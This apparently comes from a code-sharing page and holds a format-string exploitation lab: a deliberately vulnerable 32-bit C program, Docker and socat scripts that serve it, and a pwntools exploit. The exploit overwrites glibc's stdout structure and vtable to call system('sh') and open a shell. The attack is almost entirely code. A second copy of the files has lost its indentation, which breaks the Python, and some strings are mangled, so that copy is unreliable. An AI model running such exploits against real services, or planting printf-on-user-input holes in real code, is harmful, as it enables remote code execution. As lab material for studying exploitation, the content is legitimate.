Tosainu · March 21, 2017 09:33
diff --git a/Dockerfile b/Dockerfile
 FROM debian:jessie

 ENV DEBIAN_FRONTEND noninteractive
 RUN \
  apt-get update && \
  apt-get install -y libc6-i386 socat && \
  apt-get clean && \
  rm -rf /var/cache/apt/archives/* /var/lib/apt/lists/*

 CMD ["/bin/bash"]
diff --git a/exploit.py b/exploit.py
 #!/usr/bin/env python2

 from pwn import *
 import sys

 context(os='linux', arch='i386')

 # $ ./vuln
 # [*] addr_libc_system: 0xf752d290
 # [*] addr_libc_stdout: 0xf76add40
 # [*] sizeof(*stdout): 0x94
 # [*] pwn me!
 # AAAA%p.%p.%p.%p.%p.%p.%p.%p
 # AAAA0x100.0xf76ad580.(nil).0xffa16100.(nil).(nil).0x41414141.0x252e7025
 fsb_index = 7

 if 'remote' in sys.argv:
    r = None
 else:
    r = remote('172.17.0.2', 4000)

 r.recvuntil('addr_libc_system: ')
 addr_libc_system = int(r.recvline()[:-1], 16)
 log.success('addr_libc_system: 0x{:x}'.format(addr_libc_system))

 r.recvuntil('addr_libc_stdout: ')
 addr_libc_stdout = int(r.recvline()[:-1], 16)
 log.success('addr_libc_stdout: 0x{:x}'.format(addr_libc_stdout))

 r.recvuntil('sizeof(*stdout): ')
 sizeof_stdout = int(r.recvline()[:-1], 16)
 log.success('sizeof(*stdout): 0x{:x}'.format(sizeof_stdout))

 addr_libc_stdout_vtable = addr_libc_stdout + sizeof_stdout
 log.success('addr_libc_stdout_vtable: 0x{:x}'.format(addr_libc_stdout_vtable))

 r.recvuntil('pwn me!\n')

 # ECX: 0x41424344 ('DCBA')                      <- addr_libc_stdout_vtable
 #
 #    0xf758707c:	mov    DWORD PTR [esp+0x8],edx
 #    0xf7587080:	mov    DWORD PTR [esp+0x4],eax
 #    0xf7587084:	mov    DWORD PTR [esp],esi
 # => 0xf7587087:	call   DWORD PTR [ecx+0x1c]
 #    0xf758708a:	mov    edx,DWORD PTR [esp+0x18]
 #    0xf758708e:	cmp    eax,edx
 #    0xf7587090:	mov    eax,0xffffffff
 #    0xf7587095:	cmovne edi,eax
 # Guessed arguments:
 # arg[0]: 0xf76e8ac0 --> 0xfbad2887             <- addr_libc_stdout
 # arg[1]: 0xffd477b0 --> 0xf76e8b54 ("DCBA")    <- buf
 # arg[2]: 0x342 

 writes  = {addr_libc_stdout:        int(u32('sh\x00\x00')),
           addr_libc_stdout - 0x04: addr_libc_system,
           addr_libc_stdout_vtable: addr_libc_stdout - 0x1c - 0x04}
 payload = fmtstr_payload(fsb_index, writes)

 r.sendline(payload)

 r.clean()
 r.interactive()
diff --git a/Makefile b/Makefile
 vuln: vuln.c
 	gcc -std=c11 -m32 -no-pie -fstack-protector-strong -Wl,-z,relro,-z,now vuln.c -o vuln
diff --git a/start_docker_container.sh b/start_docker_container.sh
 #!/usr/bin/bash

 set -e

 echo "[*] building a docker container"
 docker build -t debian-socat . --no-cache --rm

 echo "[*] starting a docker container"
 CID=$(docker run -v "$PWD":/work -d debian-socat \
      /usr/bin/socat tcp-listen:4000,reuseaddr,fork exec:/work/vuln)

 # http://stackoverflow.com/questions/17157721/getting-a-docker-containers-ip-address-from-the-host
 docker inspect --format '[+] nc {{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}} 4000' $CID
diff --git a/vuln.c b/vuln.c
 #include <stdio.h>
 #include <stdlib.h>

 int main() {
  setvbuf(stdin, NULL, _IONBF, 0);
  setvbuf(stdout, NULL, _IONBF, 0);

  printf("[*] addr_libc_system: %p\n", system);
  printf("[*] addr_libc_stdout: %p\n", stdout);
  printf("[*] sizeof(*stdout): 0x%lx\n", sizeof(*stdout));

  printf("[*] pwn me!\n");
  char buf[0x100];
  fgets(buf, 0x100, stdin);
  printf(buf);
 }
	FROM debian:jessie

	ENV DEBIAN_FRONTEND noninteractive
	RUN \
	apt-get update && \
	apt-get install -y libc6-i386 socat && \
	apt-get clean && \
	rm -rf /var/cache/apt/archives/* /var/lib/apt/lists/*

	CMD ["/bin/bash"]
	#!/usr/bin/env python2

	from pwn import *
	import sys

	context(os='linux', arch='i386')

	# $ ./vuln
	# [*] addr_libc_system: 0xf752d290
	# [*] addr_libc_stdout: 0xf76add40
	# [] sizeof(stdout): 0x94
	# [*] pwn me!
	# AAAA%p.%p.%p.%p.%p.%p.%p.%p
	# AAAA0x100.0xf76ad580.(nil).0xffa16100.(nil).(nil).0x41414141.0x252e7025
	fsb_index = 7

	if 'remote' in sys.argv:
	r = None
	else:
	r = remote('172.17.0.2', 4000)

	r.recvuntil('addr_libc_system: ')
	addr_libc_system = int(r.recvline()[:-1], 16)
	log.success('addr_libc_system: 0x{:x}'.format(addr_libc_system))

	r.recvuntil('addr_libc_stdout: ')
	addr_libc_stdout = int(r.recvline()[:-1], 16)
	log.success('addr_libc_stdout: 0x{:x}'.format(addr_libc_stdout))

	r.recvuntil('sizeof(*stdout): ')
	sizeof_stdout = int(r.recvline()[:-1], 16)
	log.success('sizeof(*stdout): 0x{:x}'.format(sizeof_stdout))

	addr_libc_stdout_vtable = addr_libc_stdout + sizeof_stdout
	log.success('addr_libc_stdout_vtable: 0x{:x}'.format(addr_libc_stdout_vtable))

	r.recvuntil('pwn me!\n')

	# ECX: 0x41424344 ('DCBA') <- addr_libc_stdout_vtable
	#
	# 0xf758707c: mov DWORD PTR [esp+0x8],edx
	# 0xf7587080: mov DWORD PTR [esp+0x4],eax
	# 0xf7587084: mov DWORD PTR [esp],esi
	# => 0xf7587087: call DWORD PTR [ecx+0x1c]
	# 0xf758708a: mov edx,DWORD PTR [esp+0x18]
	# 0xf758708e: cmp eax,edx
	# 0xf7587090: mov eax,0xffffffff
	# 0xf7587095: cmovne edi,eax
	# Guessed arguments:
	# arg[0]: 0xf76e8ac0 --> 0xfbad2887 <- addr_libc_stdout
	# arg[1]: 0xffd477b0 --> 0xf76e8b54 ("DCBA") <- buf
	# arg[2]: 0x342

	writes = {addr_libc_stdout: int(u32('sh\x00\x00')),
	addr_libc_stdout - 0x04: addr_libc_system,
	addr_libc_stdout_vtable: addr_libc_stdout - 0x1c - 0x04}
	payload = fmtstr_payload(fsb_index, writes)

	r.sendline(payload)

	r.clean()
	r.interactive()
	vuln: vuln.c
	gcc -std=c11 -m32 -no-pie -fstack-protector-strong -Wl,-z,relro,-z,now vuln.c -o vuln
	#!/usr/bin/bash

	set -e

	echo "[*] building a docker container"
	docker build -t debian-socat . --no-cache --rm

	echo "[*] starting a docker container"
	CID=$(docker run -v "$PWD":/work -d debian-socat \
	/usr/bin/socat tcp-listen:4000,reuseaddr,fork exec:/work/vuln)

	# http://stackoverflow.com/questions/17157721/getting-a-docker-containers-ip-address-from-the-host
	docker inspect --format '[+] nc {{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}} 4000' $CID
	#include <stdio.h>
	#include <stdlib.h>

	int main() {
	setvbuf(stdin, NULL, _IONBF, 0);
	setvbuf(stdout, NULL, _IONBF, 0);

	printf("[*] addr_libc_system: %p\n", system);
	printf("[*] addr_libc_stdout: %p\n", stdout);
	printf("[] sizeof(stdout): 0x%lx\n", sizeof(*stdout));

	printf("[*] pwn me!\n");
	char buf[0x100];
	fgets(buf, 0x100, stdin);
	printf(buf);
	}